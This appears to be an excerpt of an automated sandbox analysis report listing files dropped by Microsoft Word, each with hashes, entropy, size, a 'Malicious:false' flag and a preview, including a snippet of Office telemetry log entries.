                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.03351732319703582
                            Encrypted:false
                            SSDEEP:3:ol3lG:40
                            MD5:830FBF83999E052538EAF156AB6ECB17
                            SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                            SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                            SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.03351732319703582
                            Encrypted:false
                            SSDEEP:3:ol3lG:40
                            MD5:830FBF83999E052538EAF156AB6ECB17
                            SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                            SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                            SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.03351732319703582
                            Encrypted:false
                            SSDEEP:3:ol3lG:40
                            MD5:830FBF83999E052538EAF156AB6ECB17
                            SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                            SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                            SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.03351732319703582
                            Encrypted:false
                            SSDEEP:3:ol3lG:40
                            MD5:830FBF83999E052538EAF156AB6ECB17
                            SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                            SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                            SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.03351732319703582
                            Encrypted:false
                            SSDEEP:3:ol3lG:40
                            MD5:830FBF83999E052538EAF156AB6ECB17
                            SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                            SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                            SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1536
                            Entropy (8bit):1.4929866398948992
                            Encrypted:false
                            SSDEEP:3:ml+lGl+l+l+l1PPPHRlALlP//lXl7lhlJvl5hzldlxpxl/b1l/pl/Ppl/Rl/Pbh1:mEMEEE3Dmlc9lCgK2LqisLn+S
                            MD5:E9E957D176044578E893268A50BE0B1A
                            SHA1:2122D1FAE7B932B9561C665E5DE372A3433C9BC2
                            SHA-256:19BD0E3A54E0900FE798CC8CD6BD2250238390C1BBEC96FF95C35DBEA1426AB7
                            SHA-512:C1C3A878C2FD9730176A7A7E4B473BD36038046808967BBB5C313D5AB3894D2FCA2DFC1A4FEA2D733428DAA29D6384C73333915C226793BB1EDF26B88171C4EF
                            Malicious:false
                            Preview:....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(...j.o.n.e.s...j............................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...&...(.......0...6...8...>...@...D...F...J...L...P...R...V...X...\...h.......................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.03351732319703582
                            Encrypted:false
                            SSDEEP:3:ol3lG:40
                            MD5:830FBF83999E052538EAF156AB6ECB17
                            SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                            SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                            SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.03351732319703582
                            Encrypted:false
                            SSDEEP:3:ol3lG:40
                            MD5:830FBF83999E052538EAF156AB6ECB17
                            SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                            SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                            SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):1024
                            Entropy (8bit):0.05194905805374581
                            Encrypted:false
                            SSDEEP:3:1lvlxlln:vz
                            MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                            SHA1:D15075354757A59DE6E057435511D956663955FB
                            SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                            SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with very long lines (10145), with CRLF line terminators
                            Category:dropped
                            Size (bytes):28838
                            Entropy (8bit):5.4717410119625915
                            Encrypted:false
                            SSDEEP:768:H5TYGjNyAan+tY7zEdV5zv/vuSnJNNm7XOG+BYQiSpkwLiQ2SDf:H5TYGjNyZ+tY/2V5j3uSnJNNmeG+BYQH
                            MD5:A2568776C99EA301F92A687AAF81C4B1
                            SHA1:AE14630BDB6F1A5C2BB0BD4359972B468B9C01C2
                            SHA-256:624A52E6ABDA8801728501DD0C3267E567D227B7EC4285CE05BCFBCF5F70865C
                            SHA-512:B03E23A17DB8B84F3D8F2960B624C2BBCF1BBD37DE2C46A017A7FDB2877A3D069BFB9E6F1FEA9FB0D32EDA81229E8E1C6FB694B842C339C8BF49B76B1930C4B2
                            Malicious:false
                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..05/08/2024 23:48:06.779.WINWORD (0x19AC).0x4EC.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-05-08T23:48:06.779Z","Contract":"Office.System.Activity","Activity.CV":"eaXwXNwV/0S+x93bZAtVFA.7.1","Activity.Duration":1073,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...05/08/2024 23:48:06.779.WINWORD (0x19AC).0x4EC.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":24,"Time":"2024-05-08T23:48:06.779Z","Contract":"Office.System.Activity","Activity.CV":"eaXwXNwV/0S+x93bZAtVFA.7","Activity.Duration":3160,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureDi
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with very long lines (28934), with CRLF line terminators
                            Category:dropped
                            Size (bytes):20971520
                            Entropy (8bit):0.35834354265701723
                            Encrypted:false
                            SSDEEP:6144:9keQb1MgCSH1i9gRshj35a+AelCLlellNx4QoW:c1/K
                            MD5:C596FF825E1A9B1801134B33949F4D26
                            SHA1:D12A63DEBB3CF8C226F286F65A5EB50494BC3D14
                            SHA-256:9281905AE562CFAAEC0679BCF5C577B446B703382021465B2E5DE7A3D906DC30
                            SHA-512:BDD51D265317C26F30BA8FE94EA66B03B13FFC70C88932401E53D4FC69500C423DCFE4BE4C549EE87FC33867F565D060FEFB415FC88B13FD7CBA883F96EBAB16
                            Malicious:false
